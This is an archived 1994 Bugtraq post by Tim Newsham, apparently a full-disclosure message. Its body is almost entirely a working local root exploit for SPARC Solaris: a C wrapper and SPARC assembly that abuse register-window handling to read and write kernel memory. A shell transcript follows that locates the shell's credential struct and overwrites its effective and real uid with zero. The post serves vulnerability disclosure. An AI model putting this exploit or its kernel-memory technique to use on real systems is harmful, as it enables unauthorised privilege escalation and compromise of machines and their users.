Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1994_4

Bugtraq archives for 4th quarter (Oct-Dec) 1994: [Tim Newsham: ]

[Tim Newsham: ]

Tim Newsham (newshamuhunix.uhcc.hawaii.edu)
Sun, 2 Oct 1994 08:18:56 -1000

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Tim Newsham: "[Tim Newsham: ]"
Previous message: Tim Newsham: "[Tim Newsham: ]"

cat > readc.c << _EOF_
main(argc, argv) char *argv[]; {
    printf("0x%x\n", rdmem(strtoul(argv[1], 0, 0)));
}
_EOF_
cat > reads.s << _EOF_
.globl  rdmem
 
rdmem:
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %sp, %i4
        mov     %o7, %i7
        btst    4, %o0
        andn    %o0, 7, %fp
        restore
        bz,a    .+12
        mov     %l0, %i0
        mov     %l1, %i0
        mov     %o4, %fp
        retl
        restore
_EOF_
cat > writec.c << _EOF_
main(argc, argv) char *argv[]; {
    wrmem(strtoul(argv[1], 0, 0), strtoul(argv[2], 0, 0));
}
_EOF_
cat > writes.s << _EOF_
.globl  wrmem
 
wrmem:
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %o1, %i1
        mov     %sp, %i4
        mov     %o7, %i7
        btst    4, %o0
        andn    %o0, 7, %fp
        restore
        bz,a    .+12
        mov     %o1, %l0
        mov     %o1, %l1
 
        save    %o4, 64, %sp
 
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %o4, %fp
        retl
        restore
_EOF_
cc -o read readc.c reads.s
cc -o write writec.c writes.s
otsuka% ps -lp $$
 F S   UID   PID  PPID  C PRI NI     ADDR     SZ    WCHAN TTY      TIME COMD
 8 S 23384   641     1145   1 20 fcfd6800    374 fcfd69c8 console  0:01 csh
# Offset 0x28 is the pointer to the shell's ucred struct.
otsuka% ./read 0xfcfd6828
0xfcfbc380
# Offsets 0x4 and 0xc in the ucred contain the effective and real uid.
otsuka% ./write 0xfcfbc384 0
otsuka% ./write 0xfcfbc38c 0
whoami

Next message: Tim Newsham: "[Tim Newsham: ]"
Previous message: Tim Newsham: "[Tim Newsham: ]"